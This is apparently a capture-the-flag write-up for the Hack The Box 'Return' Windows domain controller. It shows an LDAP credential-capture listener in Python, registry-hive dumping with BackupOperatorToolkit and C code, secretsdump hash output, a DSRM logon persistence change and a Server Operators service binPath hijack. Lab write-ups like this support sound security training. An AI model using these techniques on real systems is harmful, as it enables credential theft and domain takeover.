HTB Return
Return
Getting a shell
Start with a quick nmap to see which common ports are open:
# nmap 10.129.242.236
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
There is an HTTP service, so take a look: it is a printer admin page with a settings form for Server Address, Port, Username and Password.
Oddly, when you click Update the request only carries the IP; the other three parameters are not sent at all.
So set the Server Address to our own IP, keep the default port (389), and start a listener to see what the box sends:
#nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.26] from (UNKNOWN) [10.129.242.236] 65481
0*`%return\svc-printer
1edFg43012!!
The output looks garbled because it is a raw LDAP simple-bind request (BER-encoded), but the cleartext is obvious: the bind name is return\svc-printer and the password is 1edFg43012!!.
Check what this account can do:
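What nc prints above is the BER framing of an LDAP simple-bind request: the tag bytes 0x30 (SEQUENCE) and 0x60 ([APPLICATION 0] BindRequest) render as the characters 0 and `, and the length bytes 0x2a and 0x25 render as * and %. The listener below is an added example for this writeup (not code from the original post, from HTB or from any tool mentioned here): it decodes that framing, extracts the bind name and password, and answers with an invalidCredentials result so the client closes the connection cleanly. The SAMPLE bytes are constructed here from the credentials the capture revealed; the function and variable names are my own.

```python
"""Minimal LDAP listener that decodes a simple BindRequest (RFC 4511)."""
import socket


def ber(tag: int, value: bytes) -> bytes:
    """Encode one BER TLV, using long-form length when value >= 128 bytes."""
    n = len(value)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + value


def ber_int(n: int) -> bytes:
    """INTEGER with a leading zero byte when the high bit is set."""
    return ber(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big"))


def read_tlv(buf: bytes, pos: int = 0):
    """Decode one BER TLV at buf[pos]; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(msg: bytes) -> dict:
    """LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp BindRequest }
    BindRequest ::= [APPLICATION 0] SEQUENCE { version INTEGER, name OCTET STRING,
                                               authentication simple [0] OCTET STRING }"""
    tag, body, _ = read_tlv(msg)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = read_tlv(body)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(body, pos)
    if tag != 0x60:                       # 0x60 = [APPLICATION 0] BindRequest
        raise ValueError("protocolOp is not a BindRequest (tag 0x%02x)" % tag)
    _, ver, pos = read_tlv(op)
    _, name, pos = read_tlv(op, pos)
    tag, auth, _ = read_tlv(op, pos)
    if tag != 0x80:                       # 0x80 = simple; 0xA3 would be SASL, no cleartext
        raise ValueError("not a simple bind, no cleartext password here")
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "name": name.decode("utf-8", "replace"),
        "password": auth.decode("utf-8", "replace"),
    }


def build_bind_request(msg_id: int, name: str, password: str) -> bytes:
    """Encode a simple BindRequest; used here to construct offline test input."""
    op = ber_int(3) + ber(0x04, name.encode()) + ber(0x80, password.encode())
    return ber(0x30, ber_int(msg_id) + ber(0x60, op))


def build_bind_response(msg_id: int, result_code: int = 49) -> bytes:
    """BindResponse [APPLICATION 1] carrying an LDAPResult (49 = invalidCredentials)."""
    result = ber(0x0A, bytes([result_code])) + ber(0x04, b"") + ber(0x04, b"")
    return ber(0x30, ber_int(msg_id) + ber(0x61, result))


# Constructed sample (assumption): the bytes behind the nc output above,
# i.e. 30 2a 02 01 01 60 25 02 01 03 04 12 "return\svc-printer" 80 0c "1edFg43012!!".
SAMPLE = build_bind_request(1, "return\\svc-printer", "1edFg43012!!")


def serve_once(bind_addr: str = "0.0.0.0", port: int = 389) -> dict:
    """Accept one connection, decode its bind, reply, and return the credentials."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            creds = parse_bind_request(conn.recv(4096))   # a bind fits in one segment
            conn.sendall(build_bind_response(creds["message_id"]))
    creds["peer"] = peer[0]
    return creds


if __name__ == "__main__":
    print(parse_bind_request(SAMPLE))     # offline self-check against the sample
    print(serve_once())                   # then wait for the real printer to connect
```

Run it as root (or with CAP_NET_BIND_SERVICE) on the attacker host, then submit the form with the Server Address pointing at it. Unlike nc it refuses SASL binds (tag 0xA3) instead of printing noise, and the self-check against SAMPLE shows what a successful decode looks like before the real request arrives.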
#nxc winrm 10.129.242.236 -u svc-printer -p '1edFg43012!!'
WINRM 10.129.242.236 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.129.242.236 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
WinRM login works.
Privilege escalation
Log in with evil-winrm and check the privileges:
#evil-winrm -i 10.129.242.236 -u svc-printer -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
That is a lot of privileges, and the box can be done in several ways; SeBackupPrivilege first.
SeBackupPrivilege
Dumping SAM and SYSTEM directly gives local account hashes, but those cannot be used to log on to the domain controller: on a DC the local Administrator held in the SAM is really the DSRM (Directory Services Restore Mode) account, and by default (DsrmAdminLogonBehavior = 0) it may only log on when the DC is booted into DSRM.
There are two ways around this: get the machine account hash, or change the registry so the DSRM account is allowed to log on normally.
First the machine account hash. It lives in the LSA secrets ($MACHINE.ACC), so the SECURITY hive is needed on top of SAM and SYSTEM.
In this shell a plain reg save of SECURITY does not work, so another tool has to stand in.
For example BackupOperatorToolkit; its usage is .\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK
Here the command is .\BackupOperatorToolkit.exe DUMP . printer (the binary was renamed to BOTK.exe on the box):
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ./BOTK.exe DUMP . printer
DUMP MODE
[+] Connecting to registry hive
[+] hive: SAM
[+] Dumping hive to .
[+] Connecting to registry hive
[+] hive: SYSTEM
[+] Dumping hive to .
[+] Connecting to registry hive
[+] hive: SECURITY
[+] Dumping hive to .
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/22/2026 1:09 AM 28672 .SAM
-a---- 2/22/2026 1:09 AM 36864 .SECURITY
-a---- 2/22/2026 1:09 AM 16109568 .SYSTEM
-a---- 2/22/2026 1:08 AM 20992 BOTK.exe
-ar--- 2/21/2026 9:44 PM 34 user.txt
The toolkit simply appends the hive name to the path, hence .SAM, .SECURITY and .SYSTEM. Download them (renamed to sam, system and security here) and decrypt them offline:
#impacket-secretsdump -sam sam -system system -security security LOCAL
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:a9851ac6ed45eca09e2e8b5de5faeecd7709e6ee0dda8d450560295a6d2a4a70f1c5896022559db741abf1c4f6f9142b14e32b3905d5e1c653ea32b5c99fc2711679ed77f36b7ca77192f9ed8910e2c531ac67c2c4d3f26df45f36c2cbc0654fd56295ca2e71362d523dd90917c3a4a9f3a897466646deb29ed222faefa5ac0ee2bb0a0ae9862a8bfc8291a9eaa08aace877275ac501d207ec028d6c177180753e8448f447c152b8f0fa38fea549baa724bdf871a541cabf830cba19117e3c3a0e524b1d715c88ade220bfefd5953696369cfc3c578b1514afda21a252aae2bd494b3bea5f53ff0ad2681878cef2e6a3
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:cee44f4fbf229a992689e1c18a5e6d86
[*] DPAPI_SYSTEM
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM
0000 16 BD CA 34 21 A5 5C AD 51 ED B1 7E 4A 4F 59 B8 ...4!.\.Q..~JOY.
0010 C3 65 1E 1A 5D 6D 97 82 79 3A 58 A0 FC 2B B5 8B .e..]m..y:X..+..
0020 A4 E2 9B CF DD 7B 52 80 99 33 45 4F F1 35 15 DC .....{R..3EO.5..
0030 4F 99 B3 A1 CB 55 21 A5 CC F5 27 43 F7 16 AA BC O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Cleaning up...
The $MACHINE.ACC entry is the NT hash of the DC's own computer account (PRINTER$); this writeup stops at dumping it. There are other tools around as well, for example BackupOperators.cpp:
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
/* Optional: log on with explicit credentials and impersonate them so the
   remote registry connection below is made as svc-printer. */
void MakeToken() {
HANDLE token;
const char username[] = "svc-printer";
const char password[] = "1edFg43012!!";
const char domain[] = "return.local";
if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
printf("LogonUserA: %lu\n", GetLastError());
exit(1);
}
if (ImpersonateLoggedOnUser(token) == 0) {
printf("ImpersonateLoggedOnUser: %lu\n", GetLastError());
exit(1);
}
}
int main()
{
HKEY hklm;
HKEY hkey;
LONG result;
const char* hives[] = { "SAM","SYSTEM","SECURITY" };
/* Output paths are interpreted on the machine whose registry is opened. */
const char* files[] = { "C:\\windows\\tasks\\sam.hive","C:\\windows\\tasks\\system.hive","C:\\windows\\tasks\\security.hive" };
//Uncomment if using alternate credentials.
//MakeToken();
/* Open HKLM on the target through the Remote Registry service. */
result = RegConnectRegistryA("\\\\PRINTER", HKEY_LOCAL_MACHINE, &hklm);
if (result != ERROR_SUCCESS) {
printf("RegConnectRegistryA: %ld\n", result);
exit(1);
}
for (int i = 0; i < 3; i++) {
printf("Dumping %s hive to %s\n", hives[i], files[i]);
/* REG_OPTION_BACKUP_RESTORE asks for backup-privilege semantics instead of
   the key's DACL; that is what lets a Backup Operator open SECURITY. */
result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
if (result != ERROR_SUCCESS) {
printf("RegOpenKeyExA: %ld\n", result);
exit(1);
}
/* Write the whole hive to disk; the caller needs SeBackupPrivilege. */
result = RegSaveKeyA(hkey, files[i], NULL);
if (result != ERROR_SUCCESS) {
printf("RegSaveKeyA: %ld\n", result);
exit(1);
}
RegCloseKey(hkey);
}
RegCloseKey(hklm);
return 0;
}
It uses the same RegOpenKeyEx with REG_OPTION_BACKUP_RESTORE plus RegSaveKey approach and can be used to dump the hives as well.
The other option is the registry change, again with BackupOperatorToolkit. Its DSRM mode writes DsrmAdminLogonBehavior; a value of 2 lets the DSRM administrator log on at any time rather than only in DSRM (this is a well-known persistence trick, so expect it to be monitored):
*Evil-WinRM* PS C:\Users\svc-printer\Documents> ./BOTK.exe DSRM printer 2
DSRM MODE
[+] Opening target hive to write
[+] Setting DsrmAdminLogonBehavior value to 2
Check the result:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior"
DsrmAdminLogonBehavior : 2
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
PSChildName : Lsa
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Then decrypt the local account hashes offline (only SAM and SYSTEM are needed for this path):
#impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
WinRM login with the hash:
#evil-winrm -i 10.129.242.236 -u 'PRINTER\Administrator' -H "34386a771aaca697f447754e4863d38a"
Note that the username has to be given as machine-name\Administrator (PRINTER\Administrator); otherwise the login is treated as an attempt against the domain Administrator account and fails.
Server Operators
The Server Operators group membership can be abused as well.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2021 12:15:13 AM
Password expires Never
Password changeable 5/27/2021 12:15:13 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/21/2026 10:15:05 PM
Logon hours allowed All
Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Global Group memberships *Domain Users
svc-printer is a member of Server Operators, and members of that group can start, stop and reconfigure system services.
So we can point an existing service's binary path at a command that adds svc-printer to the local Administrators group and restart it; the command then runs under the service's account, which for VSS is LocalSystem. Record the original binPath first (sc.exe qc VSS) so the service can be restored afterwards.
sc.exe config VSS binPath= "cmd.exe /c net localgroup administrators svc-printer /add"
sc.exe stop VSS
sc.exe start VSS
The start reports a failure because cmd.exe never checks in with the Service Control Manager, but the command has already run by then. Reconnect (the new group membership only shows up in a fresh logon token) and check the groups:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
svc-printer is now in the Administrators group, so just read the flag.
Finally
I feel SeRestorePrivilege and the like could also be used for privilege escalation here.
This time I learned the Server Operators and SeBackupPrivilege techniques.